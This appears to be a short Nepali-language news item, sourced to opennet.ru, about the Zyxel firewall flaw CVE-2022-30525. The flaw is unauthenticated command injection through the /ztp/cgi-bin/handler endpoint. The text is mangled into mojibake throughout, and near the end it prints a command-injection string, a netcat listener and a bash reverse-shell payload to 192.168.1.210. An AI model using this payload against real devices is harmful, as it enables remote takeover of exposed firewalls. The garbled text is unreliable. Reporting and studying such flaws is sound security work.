рдПрдЯреАрдкреА, VPN рд░ USG FLEX рд╢реГрдЩреНрдЦрд▓рд╛рдХрд╛ Zyxel рдЙрдкрдХрд░рдгрд╣рд░реВрдорд╛ рдПрдЙрдЯрд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдЬреЛрдЦрд┐рдо (CVE-2022-30525) рдкрд╣рд┐рдЪрд╛рди рдЧрд░рд┐рдПрдХреЛ рдЫ, рдЙрджреНрдпрдорд╣рд░реВрдорд╛ рдлрд╛рдпрд░рд╡рд╛рд▓, IDS рд░ VPN рдХреЛ рд╕рдЮреНрдЪрд╛рд▓рди рд╡реНрдпрд╡рд╕реНрдерд┐рдд рдЧрд░реНрди рдбрд┐рдЬрд╛рдЗрди рдЧрд░рд┐рдПрдХреЛ рдЫ, рдЬрд╕рд▓реЗ рдмрд╛рд╣реНрдп рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓рд╛рдИ рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдмрд┐рдирд╛ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдзрд┐рдХрд╛рд░ рдмрд┐рдирд╛ рдЙрдкрдХрд░рдгред рдЖрдХреНрд░рдордг рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐, рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓реЗ HTTP/HTTPS рдкреНрд░реЛрдЯреЛрдХрд▓ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдпрдиреНрддреНрд░рдорд╛ рдЕрдиреБрд░реЛрдзрд╣рд░реВ рдкрдард╛рдЙрди рд╕рдХреНрд╖рдо рд╣реБрдиреБрдкрд░реНрдЫред Zyxel рд▓реЗ ZLD 5.30 рдлрд░реНрдорд╡реЗрдпрд░ рдЕрдкрдбреЗрдЯрдорд╛ рдХрдордЬреЛрд░реА рдлрд┐рдХреНрд╕ рдЧрд░реЗрдХреЛ рдЫред Shodan рд╕реЗрд╡рд╛рдХрд╛ рдЕрдиреБрд╕рд╛рд░, рд╣рд╛рд▓ рд╡рд┐рд╢реНрд╡рд╡реНрдпрд╛рдкреА рдиреЗрдЯрд╡рд░реНрдХрдорд╛ 16213 рд╕рдореНрднрд╛рд╡рд┐рдд рд░реВрдкрдорд╛ рдХрдордЬреЛрд░ рдпрдиреНрддреНрд░рд╣рд░реВ рдЫрдиреН рдЬрд╕рд▓реЗ HTTP/HTTPS рдорд╛рд░реНрдлрдд рдЕрдиреБрд░реЛрдзрд╣рд░реВ рд╕реНрд╡реАрдХрд╛рд░ рдЧрд░реНрджрдЫред
рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдмрд┐рдирд╛ рдкрд╣реБрдБрдЪрдпреЛрдЧреНрдп рд╡реЗрдм рд╣реНрдпрд╛рдиреНрдбрд▓рд░ /ztp/cgi-bin/handler рд▓рд╛рдИ рд╡рд┐рд╢реЗрд╖ рд░реВрдкрдорд╛ рдбрд┐рдЬрд╛рдЗрди рдЧрд░рд┐рдПрдХрд╛ рдЖрджреЗрд╢рд╣рд░реВ рдкрдард╛рдПрд░ рд╕рдЮреНрдЪрд╛рд▓рди рдЧрд░рд┐рдиреНрдЫред lib_wan_settings.py рд▓рд╛рдЗрдмреНрд░реЗрд░реАрдорд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдПрдХреЛ os.system рдХрд▓ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдкреНрд░рдгрд╛рд▓реАрдорд╛ рдЖрджреЗрд╢рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрджрд╛ рд░ setWanPortSt рдЕрдкрд░реЗрд╕рди рдкреНрд░рд╢реЛрдзрди рдЧрд░реНрджрд╛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрджрд╛ рдЕрдиреБрд░реЛрдз рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВрдХреЛ рдЙрдЪрд┐рдд рд╕рдлрд╛рдИрдХреЛ рдЕрднрд╛рд╡рд▓реЗ рд╕рдорд╕реНрдпрд╛ рдЙрддреНрдкрдиреНрди рд╣реБрдиреНрдЫред
рдЙрджрд╛рд╣рд░рдг рдХреЛ рд▓рд╛рдЧреА, рдПрдХ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓реЗ рд╕реНрдЯреНрд░рд┐рдЩ рдкрд╛рд╕ рдЧрд░реНрди рд╕рдХреНрдЫ "; рдкрд┐рдВрдЧ 192.168.1.210;" рдЬрд╕рд▓реЗ рдкреНрд░рдгрд╛рд▓реАрдорд╛ "рдкрд┐рдВрдЧ 192.168.1.210" рдЖрджреЗрд╢рдХреЛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рдиреЗрддреГрддреНрд╡ рдЧрд░реНрдиреЗрдЫред рдХрдорд╛рдгреНрдб рд╢реЗрд▓рдорд╛ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди, рддрдкрд╛рдЗрдБ рдЖрдлреНрдиреЛ рдкреНрд░рдгрд╛рд▓реАрдорд╛ "nc -lvnp 1270" рдЪрд▓рд╛рдЙрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫ, рд░ рддреНрдпрд╕рдкрдЫрд┐ '; bash -c \┬╗exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\┬╗;'ред
рд╕реНрд░реЛрдд: opennet.ru